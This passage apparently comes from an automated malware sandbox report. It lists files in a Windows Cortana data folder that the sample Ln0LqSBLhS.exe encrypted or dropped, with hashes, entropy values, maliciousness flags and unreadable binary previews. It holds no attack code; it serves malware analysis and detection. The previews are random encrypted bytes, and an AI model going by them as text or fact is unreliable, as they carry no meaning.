                                                                                                                                                                                                    Preview: ..u."."...=j4Ky.q.....=..H.1....K..MJP.Y..5..(h.....hQ.\..g.H.n.....v..q..Q<....n=.m!...N0....I..... .I...][Yy....o..KT..FA.....K..C-..I.m6...\...7<vW....D;.l`..1.cS:..6.8..X...G_.{p..7...B....p.._.{~2A.7..a...H....{..-B/0.,.V<C.]..."..c...^!_.9`.&...M[.J..@&.dY.q1l)5.C..U....|'.j..X...R..\Z.D...B..7E<.q..f.bp)......H.V..L.PN0b.X<..p.g..c=..G..XR........ hm".m"..3...{./..tI*..>?b...z.%....H..v.B......f.....|...A.Vm..(S.X...............A..4O..R..l......yn..L.x)...l.`~...R.r.,.....P........Z<aZ"s*..L...t.F.Y..`{.n.cYNjYwt&r E..._;.%Q..eU...Hu...71@....<.g$Q..}.mC.}qr1.p..A.l..K'0..H\LPs...q\.. &=...t6.?./..6D.I.".CD...-mfK........+.[UW..M&.Z.:L2...5...Qu$..;...^..H..[&p....!..x.)_..n=|:...A.*....k..g..gu..Q.;9.#(.....-PZ..|.....k..<.?.c.....)MX...U...Z........=.c.od...D.Y..^....n!u...l.8...=.KTrX ..S...e...n.Y....DnX...&.$.W...93.tIu.R..p..0..L..g.y.......V..1.5.F3<..."...t...q.:.O..D.<.....l.]....`.Xo..?...t]....@..5..H+.X........s.y
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bd237dcd-6d0f-41da-b592-06046b8e7fc0}\0.0.filtertrie.intermediate.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):20376
                                                                                                                                                                                                    Entropy (8bit):7.991504203004939
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:K3x6OkqvZ7C03M4QD3EHf36ObhvtYNnwPgXGkRvUAXdizIGQpClhiB:KB/v9XNQD+frbxt2n1HEIGuCo
                                                                                                                                                                                                    MD5:FD46DC49745D0107DF467DE6DAEC3B3E
                                                                                                                                                                                                    SHA1:1FEA334061AC092F045515CACB511F81F5A8B801
                                                                                                                                                                                                    SHA-256:59262A7C676B23A816E2719E003ECFDBD163DD8130FAF60BDA19B8BB3CBB28EC
                                                                                                                                                                                                    SHA-512:E88230D9041DB67E3293719A847820ABBB9F7208EACF8398AEF9A763F14329B0FE70A239884C969D85894192575A5FEB9E275323329AF5FDB234AFA27CCFE578
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .?.t`..Y..O.[.-.&..Kyj.]D...n.........UP..t.~P...L...x.D@./.Z8.!...&.q.Uy.Q;^y.M>.E..e...A@...`.:.Qbq%8...!`2..%..+...q.....d..o...$...gj..Fhj?.,.K.J@........H....V0....AX.b....wV^.../A..lbT.q..9.....9...........W..T[......4....H-.QXV..T...I.}8jK[3.Nk.s.......[_5.y....M|..n...v...]/..+...Y/.:.Q;..JT&>..h...zb..K.c.x$/...)..eF.K.v..&gy.....[.QU.7..$Y..z..l|....^;.4..b.e$l...~m@....Jr..n"......7.......p.LS3..D.8._l..Eo<..BE.,.......Rx,V..P".{.rp.(..O. 1.%..-..+d.Oz....#|.~....[pb...g.n.?.Q....kC..v"8..(n-qO.....|=.......p..6g.!..e....J..G[......{I..0.............m...[......a^.L&.9..".o/.....iS.%..}...P...9........P_)R....z.|.m.{5....ue..[.=.%....N.G..JI|.....q.^.4..(......g;.7.Q.Q..~Z.J...kJV.....B#.....6...)G..v..2!.Z.@...b..z-qf....vL...wT..-...Ay.FGRNS......7..$'6}.V..L....%e.K5......*.,.......!.u..9Z..q9....#j...._.F'..=.....CX1Mh.f.f%.Kj..h. ....@3YA"..j.x.5w..g.....{......D.%...P...{.+..a........Z.....}...Q.....S.q.t...j.pQ
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bd237dcd-6d0f-41da-b592-06046b8e7fc0}\Apps.ft
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):27162
                                                                                                                                                                                                    Entropy (8bit):7.993182234606555
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:VtO4Hjv1td69fAmNjtpUdOsd/vPfPupLcUPhltcpJSYpkcOYrKVpZn7ipA5D:RD9tdi4mNbUdv/PupLfzcpJ2cFK7xQA9
                                                                                                                                                                                                    MD5:36AEB0604A5C895FFCADBDE0D826170A
                                                                                                                                                                                                    SHA1:1545B5EFF62CEB546DB6ECBB4FA41DB0DA9818F5
                                                                                                                                                                                                    SHA-256:938BCDA036B9EA2CB7F83E76B988F30FC57CF2DF5201B32B75E9B3C21285CB08
                                                                                                                                                                                                    SHA-512:F89EC578B781A9316B1B5F5EC699FA07C4B9C57EBD0B417714C56B8E5E7B70A5D805EB8928167F71F9C9A3FBC6D6D66AF26CBA215D3B01253C11EF873150D17A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: #.k9R./........Wx?l..y..AN%,.uB{.JQ....q...%.*V..j~....U..V.-.JH.YH.Q.E.Es}..D..H....{..A!...?ml8..2......3b.X/.XLh..O.-q_.)....S........=.....j}...i..[.....xR....?V....u..)?....'f.....[..}Yrs.K.................F1.j...M.^.@.)h.x..`.....~....&$u.....Q..pG...vX.@..-.."%.X..j_.1.[u..u...@.....Y.,....B.f|....wm{..#.......1.&.)..K.....J..0{.RqC....EY...z..J.b$....h..Z..[....3..+.-D..4.....[.'.n..!...3...."....V.g)....)$......%.Wo.=...).3]d...3.....q..h..n.w..........x..'9L<....M.L..S..o.+.T.c.\.E<......`$Z....8..L.h......4..>m.<....?.UB.R...&.w.xg....<..A.]7...z.....Dc.....%._..].........4>&L.4..v$.~...A:..a:.w6.F.P...&y`.H9.8Zp.~D.M.......bp(....FgWj..h.mr.`@rnu.Cf.._4.'.0R.7.2.yz.Z.I_.W$....m...kp...P....r.b.1d..%.e......RK..vuh...z..5.']).W.h..$f..xn.>.;T....D...+......{.l..W.r.........Rk.... G5N.YM. ......g.U.*<....F. W 4....y..j..s.R.G..<s.)<...a.M....s.u.T....D....k.5.c.u<.....i.o.,fd..U...F..`.E.....[.z.Y...+I:G..f..^..}.a."=Q|.x..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bd237dcd-6d0f-41da-b592-06046b8e7fc0}\Apps.index
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):144402
                                                                                                                                                                                                    Entropy (8bit):7.9987955397133765
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:YveNGN8jjidgEog1GfzHxr3dxH5NnGhPmcjDBzr9VQEuc:YWN6W+gEot9ZdGLFr1uc
                                                                                                                                                                                                    MD5:9569D0080084E94B12253AD43C68CBB3
                                                                                                                                                                                                    SHA1:0F9E570DAF78A5C60E17394BE0F0128DAB77E27B
                                                                                                                                                                                                    SHA-256:280ED27141933EB896A5EFD2190922C68363E837B3948F6AEFDFC8F6352CA24D
                                                                                                                                                                                                    SHA-512:3D24DDAF45641F652E6399189A0BB92BEC38036508A32B5B21125895A76666321F8523FDD651850B47094304CA463BDF454D3B5DBCD9BB6D067BDDD6DCCB9B7C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..W....@.N;...c.cK.#.....*....,*.C....D..... .d..+..UY.XN..s...UG....F..!;K.1..Y=Nv.x5.W....w.>....L.w.'..&.I...6.T.d=[S.B../s...n..........#D.....-.8.06P6....B.\.c...;...........^....].9.J..mT..R_m8.^^D.$X.C....4...f83...-...L....$.l?..9......'.z.h|..L...H..%.'=......y ...E5.Cl5Cn...%...$V...).....).....v.'pvcQ.t."Wp.7...-.L..$/....h..0.....9,T....mg...m..o.B....=.+F..,D.^...R!...Q..(.^...).......0...?GT.m,.y&...q.*/.E.C.P.W...S+A.G....i..............rh...}."..,U,.;.t..!.....A.I..&. . 3n..#.ebh.Ye....Vq..*..Fu.OBt..T/\f".Du....2.A.......W~.$...^......_.fV...E..%..X..M.....@)].U.)0J...."...?[......B.hA.....F...yN.E.&:..8f.d.....1#...gE..$='...Y.....\.\...bo,....t%."<....{....+..E.&,...GV.xN...&.!S.Fy+Q...=4..3....7.F....p.l.j/0.ct....T....g7O....k.q..@...:=....!.........>.#.{.Y.'..3..>.!0......o.1...~...<.i..z.D....4:.d....@....j45A..VUD..0q...rK1.5....|%..5.k..q....lc..T.)..9..X.q.4g.57...]w7=c..IW.h<1.y....hd~...?Fr.82I..[.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fb9f6bf9-2f80-4c6e-a1dd-e155f09965c9}\0.0.filtertrie.intermediate.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):20586
                                                                                                                                                                                                    Entropy (8bit):7.990131744695202
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:e5oQpbvsgZ+bU8pt21Oe8mN9hPbcdgudAAheGySLwPxW0jSCT/Tdn:kQR7XDATcdguNNQsnCT/Tdn
                                                                                                                                                                                                    MD5:D69092D76C927C7E50C0587DC13F2F53
                                                                                                                                                                                                    SHA1:703D546F3F69E36CBA13DB94A891E5723AC4A2BB
                                                                                                                                                                                                    SHA-256:161E396A2060FC85D50436B0D8357E6D0D6B2145C10F87E68A24465282457089
                                                                                                                                                                                                    SHA-512:73B29B543EC69EE476048F451A419FAB7B95906C783EC9E6099D69ED6CE2E662B0DB1398C54D566E29DECDE5E2AC8549D1CDDF9D5EB60F0449068B5BFB62D716
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...E.......eH..KR.{..R.J.].7p.wk.....L+H...}...........s...I.l...L..q.......d.HJ.FON.'.&.1d..../`.R.k=.&D..P.r.H..s.i=.C.z0.@.m$.K....]If.0..P..hd!..K.J...........n......&r7+.......; e...h.v-..|..p,.).*2..<.V.]n..G.<uWS..g.N....].&f,.D]....'Q..[.w8..^l..u.w.Qh.[8e...e..@......o-..X.....y/.x...4..e..5.:.7x+......M...F..P..,G...."...v..#...g,...$,d..B..^.....6.7..i.4.....0....P...`.y.2.....*....p.qk.....V.=../...........3.+...t..[.qt.[..P......l............q....i...7...#Z..).e......xt.9."..c:...o.j.....7C.,..0.....y.B....:.\.u.g.......Z#g .t.U.h..q$.pI.1.....$..J.^....,o$l...J.O}.@y...1.|.8.3...S ..lL..gG.O..4..I...28......N.Mk...x=.E[6G./\'..R..j.c..r....l..]..U.....6z.eO<H.....p.h..'.+..y!.....6.0.%q_}.a.S...].u..>...[.L.........`.-/.g...>U..'.RFp.....D7...z....{.4..qf}.t.Q...`..i....mh.9.....L5.K...e.."...:.^.......W.r.$..0/.t..V..P.N<.3.=..... M..................Y.b+..2..l..eCA.."1/t..k.D...V.6.`....p..d*...h.zZ1>f..g
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fb9f6bf9-2f80-4c6e-a1dd-e155f09965c9}\Apps.ft
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):27483
                                                                                                                                                                                                    Entropy (8bit):7.99208648709619
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:U2b2Vl1BqKIdtLorWwXXFbCf+2sv4Msxz2gaBLJN1vcAN:JKf1XdHXtkvBz2gSLpvH
                                                                                                                                                                                                    MD5:48281082EA6E2A04EAE08A5A0A10CB3F
                                                                                                                                                                                                    SHA1:284CEA06BEFFA21FA2D1DB65B0B921A1C0FFCA8A
                                                                                                                                                                                                    SHA-256:1830F9B3D5302580C34E3555C7B87D9A6ADF66F20871B78316EA9EB9B7F31EA8
                                                                                                                                                                                                    SHA-512:603F07E466672A937D279A1EDDBB620E6D0FAC3EF044C04482698F2396B10BFD05A8A89DC8A68CED78BC30EB099767E7F9393E008FCEF2D398BA52D40583CC9C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: h.1.j|..<.!.....X1.....'g........[8..xb..E..>..o.."T.G.....}.....1..c.T.q.._&1L.$.,8.k<..<~...>..p...:WY.Vp.|.g.....&y.:8.s...`.dR.#..hk.@..w.}..J.....m..8....W./.....DE............I..D..Q.B.f .z6;...qsa.....I....ox...JP.....x.............:D...g.)}......3....WR..).....{/^...'._..(.z...2.<....|....Xz.=._.H&...../k#...d....VDT.k..\.%.l.7N.Z..@..r..].x..0...r..G...{m-9sJixGgY....7G.v.m....M....@.1.k7.o....0..3.3%_..:+%..t.`.u....].2.../..o.^0I`.FP..g.........%..'...fx..W...g.Y.......%......"w...h..<(....L...>...h.sL.)..g.f.$c-.x.+Q0.......>..LD.E....X,.;!.1.@Vd.27.1.K..Q8...8..[.ZAU...n.S.I.b..vZ....1...[+oH.x...6.?W........u._....+a.&.HA.....@/.0....RF.30.E..^....f.S..4.\....ye.2.....i..8.@|...I..|3)..u..0.C....r..S.;....S>.r...U.^.H...4..4..>(F.}..&........f..t..U.h4.!...E.............;..F:rC.....H..m..".?..; +.{...O....7m..z.'...@.yu.y.&.......t...+t)'.}#.<n..e...+bd....y..<.4....#.>......zp.....>A..V}V.....ym..a.).M..5p.YM..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fb9f6bf9-2f80-4c6e-a1dd-e155f09965c9}\Apps.index
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):145970
                                                                                                                                                                                                    Entropy (8bit):7.999015568689737
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:86Kdb94WRcGbj7MyfbU3+0bfUu51zDDh390FVqRzc5LJU28OdWpW:8lbm+wO0bfUu5hFt0/kozUfNw
                                                                                                                                                                                                    MD5:DC70CF72C8B3B549389122D9E102E577
                                                                                                                                                                                                    SHA1:789B2AE6471A9384DE9EFFA5B7A0F412697EC576
                                                                                                                                                                                                    SHA-256:E8259CAFC6B2432C12972161833DAA534E0A2108C1A3B62BB1CFEA5DED6D6835
                                                                                                                                                                                                    SHA-512:26631223CDF0FA7589D29A47242B87CE95D16E7F3F58D7A47D17A3CDDE4EB8F978D0F90C5D80618F67C47574C089920DAE7EECAFCB38E08A25AEF5B179F7CD67
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ^.e..H....n.(..f....s97.~..K.[...#..i...(q.=..l.2O~;......f!...f.E..i.<.9..m.d.Zr.x.!b.....1.....lou.8.X!1........`'.p.J...).....b.>.(.-n........b..tZt.M......&Xm(.....,.y.r[i..08E....85..O.9a...X............r.p.)0._}Q@..V..c.......3X..f.P...7._LK}...]qA.....b.....{..t..b.Z9vCi.m..s.S.E......I..X:..lK..."....v...C...N.O.I...'l..hr2p..LC.Pq.2R.s...Uj[b../...&..q.....d..q..Z.[.80.].Q.....V....8O.V*.2...?.(wt.ax.Kz......K...YM.^....8.Gx.....9..Eo.-(Cq.(.....&...*.D.a....?.^..=............-j.Z.....G....\........../.K...g.Q.DQ.+."5.J(:.^iA..d...:S.{...lj+...JF=] F.-..... /`"..1.......J%...%v.hIX.k...*6.?.X...7_{lU..3..8....Eb.....]...VX.&,..;......<..nn..$B....o.`.K....;....A.Q1\Q.*7.EaUP..G.f...._W.D.{...w.Z.4.D".. ...t....u.$.:Rg..}I..0gm8..Y.i.0u| ..(..q...U......H.ZP...?:..2.N_T.X....A....vo.a.aGC.+..z..FE....,.z[N..T,}.p=..K]F.*....QW.!;Cg.7.K....[...C-...W.Tz..1.7.v.:8..S.....@..b.Z..D`P.+...g1..A.7.,.....(.n.b..sj.}...r...tz.J....y
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\apps.csg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):609
                                                                                                                                                                                                    Entropy (8bit):7.596739481146578
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:e3PA6fghF6fOdGqdOL6326VZr2CmPIQFXj5oCtUe2Zu66NyGgS5zXcii9a:e/ShF0OoqcL6trr2CmQQtj5h6e2xGgwH
                                                                                                                                                                                                    MD5:F2A8FFF927D83367EEB909A8AF0214B1
                                                                                                                                                                                                    SHA1:EA588D46A84680C6BD4CD9867D15CE223CE7B494
                                                                                                                                                                                                    SHA-256:F1A34C9A9D5ED9A4C1B75E8F07059A614DBACB8EE95C05800C41BD6D82218E88
                                                                                                                                                                                                    SHA-512:17FED145C130CD00C4C7DFB58441D2CB4C3B87A6489542B064120ACFCE0EE7A3F00EDD8D1373647B652466307A09D400BB37B4EE0685DE25BC3F32EECB3D2447
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .4..I.?......<...}?^......q.r..C...tO.dJ.Lq..)..S`..dd.55......o.L.K...........U...T[V...*s\.6kv.../.,H..z.....v.8#wO9..$Ni.M...xw.d...S.{.PR>......e..~[.......:.A..T...W......I..C6..3.Z...OH{]........k...=.23B.mE.ku...}.A.m........x}......a...O....v.`904-....'V......ieBiZ.....L.)..n+.......AI..f.5.cQ...u..T..<.MB.J..Xn#|a.0.....\0b.t....!..>...p.t..d!..R...V.3A...`,..".@.d....=.a..E....4@.P1A..n...jA~:....G...v...~.E...4.........s./.. ..]....S.e.{.T.{.+..{.J..^"...$.nA.F.E.2.....+.%...r...K.d..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\apps.schema
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):479
                                                                                                                                                                                                    Entropy (8bit):7.51158123413048
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:mQnEdC/crtsqNGEyjZzxiYE5I9U1JJ0V6QUKvjcii9a:mQEdH5JNWjZYhO92HAhbD
                                                                                                                                                                                                    MD5:93C0E4B0348C806ED2AA0B139C62A534
                                                                                                                                                                                                    SHA1:CE2ADF5B6610D4B46222D68BBBD00D32FCB2737F
                                                                                                                                                                                                    SHA-256:D3832FE0D264FBED6BE232531E1A1069D23E0BE40BCEDBEBDA1A631D0A89DB75
                                                                                                                                                                                                    SHA-512:932CBAF15ADEEA21888BAAFE780DAAE0B96573AE4F414BA2D3E5F8FE4D9947BC46CF25A490DAD36CF6810F527D8EF69158B2320670F7F0D998C8CDC43ACDA3BE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...?Kf6G...I.`..L.....yB\*.z.]..u.2X.......a......m.[.'S./o...t.x..b....p..;f.R.._[...~.w|......K....}D......Y.*.n..E..}..aF.^..R,.#B~..vT...y{'..vhx....p1..............2..#H%.[!s':..<.gX^?^.2.[V.^....8.}......~"G...f.>..A.I/..a..\.~r.<N...+d.M.....MV.Z.'h=..2.'.S.[a._..-g..p...F.~.f.c..u<x.....5[.bl..0.X.....(d.....-..A..L..]..w....V..-.0....{..e.7`..-..../....o.My..7....<Q......*5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\appsconversions.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):31911
                                                                                                                                                                                                    Entropy (8bit):7.995118342086078
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:nLIatuJU0ViLtWmkNudE01EoqGE5bTTo9ms8sD+:/Ey0VSQJNoE0i8MTEcsl+
                                                                                                                                                                                                    MD5:6E0CFC38C6DD6D48FD77DBB0DF474FA0
                                                                                                                                                                                                    SHA1:177D063F07DA0E3D9722A811033F03EFC872CDD0
                                                                                                                                                                                                    SHA-256:5DF7533216282E04D902FA22C6117A5CC81C6830055E70A2744C04610BD2894C
                                                                                                                                                                                                    SHA-512:FB3F027F97BE8C59201E26AFAC9279A65A4BBDF1DB94B4043DB42A554EEB6690861BD5EA6B6F8266DB4058D9166BFA7A335DE31EC8636BD21A1D11265F0C6C7D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..U.K$.......*..n....I...a/M.rd..<k......xU..5..'.....X.).*..M.e...V. N*`.~..oF+N(....N9........(.V..J...?,.6S.i~>...FW-.*.a.....'...p."{.)5.Ms..; S...h...n&arWU..i'........BkG......:u...N^..c..4.......K.......FEG.f"Z..V....O"_.=h*Hnt........J...,.(....M..=(.{z..C.R...Ma*.6...<......&]..:....5.ME..~.|./-g.A./.....5[...=jI..f...7.....j.U.T#.....G...8...b.@U..r.r._.....Xn.....M....~..9Z.Qj'Z..].......>.f"9NjC....u@..HV9(,5 ..H..",.f..q.5.q.e...zT.....N.....[6].r.M ..=.u.-.8....|....'...)..S~.Z......|....k.mG..{..1.o.....C':4o...x..........g....lJ.......k.....V9w.r...........~,.<.<.}...[\...vS....Q....1...yXVM.......@fr'h..t...~y..M....KU,.0.m.u...FC.7..)I,..t.c.+A+....jqe.o..O............7.V.V.N.p..2....V.c.K..g7.\...q...u....8............@.ob...C....4}..R..s'}$gz1...2.#.?+G..>...\S..}v.!...\.i.k.+._.p`.,r..)"...O.+{....V..J...s&.,M..uB/....@.=q.....ks..Bd..=...y.....{B.G5..b..S....z"-..YW.&J..(u....y..@c.c.9....R..{.._........+x..M....>.3`..%G
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\appsglobals.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998907613719302
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:58rxQFhgViqMs8hmMohDwVFgOKEneFtdqR5VUKLyYk:5lvixF8hJo53Ftw5VLyYk
                                                                                                                                                                                                    MD5:6C68739CE8F4739301D1E02A9B495D33
                                                                                                                                                                                                    SHA1:28882C4A3BDB321FD22007D900CCC4F6AFDB71E1
                                                                                                                                                                                                    SHA-256:976A62CB1BC21A44DBA6E3371E3B210037B1A43D0AE2E8BE9D62C1BE95268A70
                                                                                                                                                                                                    SHA-512:B6506C54DC40A1B9C0C8009AA05F237B18DA747EE9DA8BC55AC3A6443215B11C18B177FFD77D599BE74B749459A0E410E03962EB81E49ED1D02065B4321798BF
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...<....wc.u..'....&....h|.C.C.u..j..D...F...3\9........|......sS<..A.S.v:..........u.W.*.g...l.:.k6i......xh.\2...........%(,I.._c;..<......y.+*........}@x.5...umL..)G....5.>.Iy.R.....H...)....4<..K.y....d.5R....0....-..Qj...5G....%.....w@U..7.u.Ai.f.K(.Z....I....]%.(.o.0.<(....Ne..........j.}_.7....@..|Q.$....\{$.........a..{.:G..<QiU.6`....;......3..rVx..q.lQ.[...t.hR..HMIU........pOkr..$3..G..-8-PHH.{K..r.:........A.}.p2.(......e.wm..9k>m...h....%a..t...X...p..k..1G....U..._.4S."*.j_g.r.h`..qK>..T".u.....<..6D..1......s....'..j.hN.5..:jm.fJ>.a.!.....].G...2....r.D..4Y......-..U........A.L.h.T.2..9...m_L..v.X..5.%@tO^......V.Q.>n...Sp.|`...&.DhM...k.>r{...#P..4v....$7.{>.n......y......m..~t.....w.|]..d59...kp.x^......+*..i..~.?...s..{}..]..1.C.....f5....x..X...(.. ..:]...[3l.y...!...O......Y.Kh.1.O/.b.._.....,.;..........2.V.V.N...;...J(.#.B..X.,..C...e@.......}..D...?..8..I:.e.....<@...n.R.$#.._u...k.`^..8_.{.]1.pu.....@....X
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\appssynonyms.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):81572
                                                                                                                                                                                                    Entropy (8bit):7.997926305428373
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:UIda+lI/ArAqWQMjpFaaIJrGnducvnpzhCIAyT32vZTWiID:UcPlI/9/jfaaIJrGn/npzhXAyDGF6
                                                                                                                                                                                                    MD5:3538DB45FCBFC19251C25D9A8A3329E0
                                                                                                                                                                                                    SHA1:604AE837B79E671D4D5A11BE63695D9A3BBBA494
                                                                                                                                                                                                    SHA-256:17BD646EAAE444F41BF2344B8DBD03DDFEABC3A1B8995C3F5021552AB16C6790
                                                                                                                                                                                                    SHA-512:97BDF19B4A903F64370AE59DD2E74627D8E08E627B2653C04F2E42BD3DC8A57B0A3C1AA76157B823540D2BFAF68AFDADB72AB66EBED309875D0B178D7E76CD20
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....K.ck.FI......h...K|h..6.\<.H..0.o.)6d.5..Z.Q..Qf..X.[....>H.i...X.L^.j.;.4M[....w..*.......,3s........(.........P.m..gv.K'&<....n.@(.$|-.t..\.m+(..?P.W....X...+.J..e..;U.D.B..;.....JA....0.\2;..Zf..ccC.&!.../(fQ+.,.oQ.+...e...6...lq..3..9K..*b..^....Jr...{^W.E...z....4..j.4.u.%.8..._...z>......I....I..Z.v...X.vuN..Uy.6...y..$..oTap./....pMWX-:)K..6P=..yh...>gB.../n.-... ........*"......{k.......A4 ..']e.............e...3E....PnG%..`...R.!oA0.Q.C...0y_.f..9...vc.....K...=[..u.]0Z.C.k...........t...S...|......x.....}$.[.C]E....%[d..3...kT..c......h....j%]g*t..!..z..........@:..j..@.../mU...#I*.z.Q.5 ...&..2.u..vb........I.m..C...-..3..;+m..T..xj..|....y......Q...Fi.K..X.+i....../..... 4d.B...M.&t.......r.......6...P..E`....t.}.o.a_(....oc*..6......%"N..`..Z...y.......0.%....R5....#.B`e.J!U..[...W.2...o..(<.O0..,C>...l#Z..}.d....`?r.K}5..m...9..a-".N..]...+..Pn.......M.<Q .G.nq..Q..O,.'EX..RQ........X....}..!..Z.=....R.._..Q..R....'....g.C.:.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settings.csg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):619
                                                                                                                                                                                                    Entropy (8bit):7.647479153624093
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:XEDtlvN/afGOqxK7a8zIIZYybzlcP7yWd1yzxhLU/FvvjDHVO4OMdj9Ucii9a:uniuia+PZYvuy1yfsvvvVfZUbD
                                                                                                                                                                                                    MD5:1955F9C417993F655D3C78C8D4239145
